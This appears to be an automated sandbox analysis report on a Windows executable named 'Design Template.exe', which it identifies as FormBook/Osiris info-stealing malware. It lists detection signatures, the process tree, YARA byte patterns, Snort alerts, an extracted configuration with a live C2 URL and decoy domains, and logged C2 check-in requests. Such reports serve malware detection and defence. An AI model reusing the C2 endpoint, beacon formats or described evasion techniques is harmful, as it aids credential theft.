Loading ...

Play interactive tourEdit tour

Analysis Report Design Template.exe

Overview

General Information

Sample Name:Design Template.exe
Analysis ID:385453
MD5:56d56566623a2bc942141b56f9dd3da5
SHA1:bc76bd9c064a7df36b84d5e08f266c8d4d9819ee
SHA256:5397f0168be76c7e5efee936d341eb359b9015af5e77631129dc0664105e9259
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Osiris FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Osiris Trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Design Template.exe (PID: 3260 cmdline: 'C:\Users\user\Desktop\Design Template.exe' MD5: 56D56566623A2BC942141B56F9DD3DA5)
    • Design Template.exe (PID: 6300 cmdline: C:\Users\user\Desktop\Design Template.exe MD5: 56D56566623A2BC942141B56F9DD3DA5)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6908 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 7036 cmdline: /c del 'C:\Users\user\Desktop\Design Template.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.zq2003.com/ma3c/"], "decoy": ["bensimonconstructions.com", "margaretta.info", "getreireply.com", "jamierighetti.com", "gxjljc.com", "internet-exerzitien.com", "appetiteintelligence.com", "buscar-id-apple.com", "unique-bikinis.com", "enclassique.com", "dafontonline.com", "northamericancarbonexchange.com", "yashasvsaluja.com", "sn-international.com", "humanvitality.site", "sarahcasias.com", "xn--vrv276h3cb.com", "curiget.xyz", "anxietyattackscure.com", "angelstonecrystals.com", "onestripemed.com", "mirgran.com", "boxtechtv.com", "healthcontrol.net", "eroutescheduling.com", "betralifcannabis.com", "advancefulfillmentcenter.net", "graphicprofessor.com", "booster-tresorerie.com", "intibeso.xyz", "modomo.amsterdam", "rionaluo.net", "6streeam.xyz", "mobundlesco.com", "sacredlight.store", "xy4869.com", "xn--casamio-9za.com", "herma-shop.com", "cfphoenixmembers.com", "ssrpss.info", "realunitystudio.com", "itsjustinscode.com", "wannabebody.com", "bwbcoa.com", "unitednations-office.com", "dallasmalerevuetix.com", "bestflowersandgifts.com", "lojasmegamoveis.com", "fyahvapes.com", "salvofoods.com", "meditationwithdaniel.com", "2elden.com", "romitoart.com", "sci-mfg.com", "xn--hy1bw5cd1ic1e75g84omki.com", "erwinsiahaan.com", "landreclaim.com", "chuanyangwenhua.com", "zzfuwusheji.com", "cannabiss.clinic", "sexichef.com", "aymauxilia.com", "conchcruiserswestpalm.com", "rememberingedward.info"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Liebert.bmpJoeSecurity_FormBookYara detected FormBookJoe Security
    C:\Users\user\AppData\Local\Temp\Liebert.bmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    C:\Users\user\AppData\Local\Temp\Liebert.bmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166a9:$sqlite3step: 68 34 1C 7B E1
      • 0x167bc:$sqlite3step: 68 34 1C 7B E1
      • 0x166d8:$sqlite3text: 68 38 2A 90 C5
      • 0x167fd:$sqlite3text: 68 38 2A 90 C5
      • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
      0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 13 entries

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: Design Template.exeAvira: detected
        Antivirus detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmpAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
        Found malware configurationShow sources
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.zq2003.com/ma3c/"], "decoy": ["bensimonconstructions.com", "margaretta.info", "getreireply.com", "jamierighetti.com", "gxjljc.com", "internet-exerzitien.com", "appetiteintelligence.com", "buscar-id-apple.com", "unique-bikinis.com", "enclassique.com", "dafontonline.com", "northamericancarbonexchange.com", "yashasvsaluja.com", "sn-international.com", "humanvitality.site", "sarahcasias.com", "xn--vrv276h3cb.com", "curiget.xyz", "anxietyattackscure.com", "angelstonecrystals.com", "onestripemed.com", "mirgran.com", "boxtechtv.com", "healthcontrol.net", "eroutescheduling.com", "betralifcannabis.com", "advancefulfillmentcenter.net", "graphicprofessor.com", "booster-tresorerie.com", "intibeso.xyz", "modomo.amsterdam", "rionaluo.net", "6streeam.xyz", "mobundlesco.com", "sacredlight.store", "xy4869.com", "xn--casamio-9za.com", "herma-shop.com", "cfphoenixmembers.com", "ssrpss.info", "realunitystudio.com", "itsjustinscode.com", "wannabebody.com", "bwbcoa.com", "unitednations-office.com", "dallasmalerevuetix.com", "bestflowersandgifts.com", "lojasmegamoveis.com", "fyahvapes.com", "salvofoods.com", "meditationwithdaniel.com", "2elden.com", "romitoart.com", "sci-mfg.com", "xn--hy1bw5cd1ic1e75g84omki.com", "erwinsiahaan.com", "landreclaim.com", "chuanyangwenhua.com", "zzfuwusheji.com", "cannabiss.clinic", "sexichef.com", "aymauxilia.com", "conchcruiserswestpalm.com", "rememberingedward.info"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: Design Template.exeVirustotal: Detection: 34%Perma Link
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmpJoe Sandbox ML: detected
        Machine Learning detection for sampleShow sources
        Source: Design Template.exeJoe Sandbox ML: detected
        Source: 14.2.rundll32.exe.7b4cd8.1.unpackAvira: Label: TR/Patched.Gen
        Source: 14.2.rundll32.exe.4997960.5.unpackAvira: Label: TR/Patched.Gen
        Source: Design Template.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: Design Template.exe, rundll32.exe
        Source: Binary string: rundll32.pdb source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
        Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx14_2_004F6A98
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi14_2_005062A3
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi14_2_004FC3B1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi14_2_00505672

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: www.zq2003.com/ma3c/
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1Host: www.zq2003.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1Host: www.betralifcannabis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1Host: www.2elden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1Host: www.landreclaim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1Host: www.rememberingedward.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1Host: www.chuanyangwenhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1Host: www.bestflowersandgifts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1Host: www.sci-mfg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1Host: www.sexichef.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
        Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
        Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1Host: www.zq2003.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1Host: www.betralifcannabis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1Host: www.2elden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1Host: www.landreclaim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1Host: www.rememberingedward.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1Host: www.chuanyangwenhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1Host: www.bestflowersandgifts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1Host: www.sci-mfg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1Host: www.sexichef.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/OnlyDomains" target="_blank" rel="nofollow" title="OnlyDomains Facebook"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: unknownDNS traffic detected: queries for: www.modomo.amsterdam
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 12:42:39 GMTServer: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9aContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
        Source: explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mi
        Source: explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micr
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: explorer.exe, 00000007.00000000.298632353.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Inter:wght
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Montserrat:wght
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/onlydomains
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://www.onlydomains.com/hosting/?utm_medium=free_parking&utm_source=landreclaim.com
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://www.onlydomains.com?utm_medium=free_parking&utm_source=landreclaim.com
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://www.trustpilot.com/review/onlydomains.com
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042CCDA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_0042CCDA
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042E537 GetKeyState,GetKeyState,GetKeyState,GetKeyState,2_2_0042E537

        E-Banking Fraud:

        barindex
        Detected Osiris TrojanShow sources
        Source: C:\Users\user\Desktop\Design Template.exeFile created: C:\Users\user\AppData\Local\Temp\Liebert.bmpJump to dropped file
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

        System Summary:

        barindex
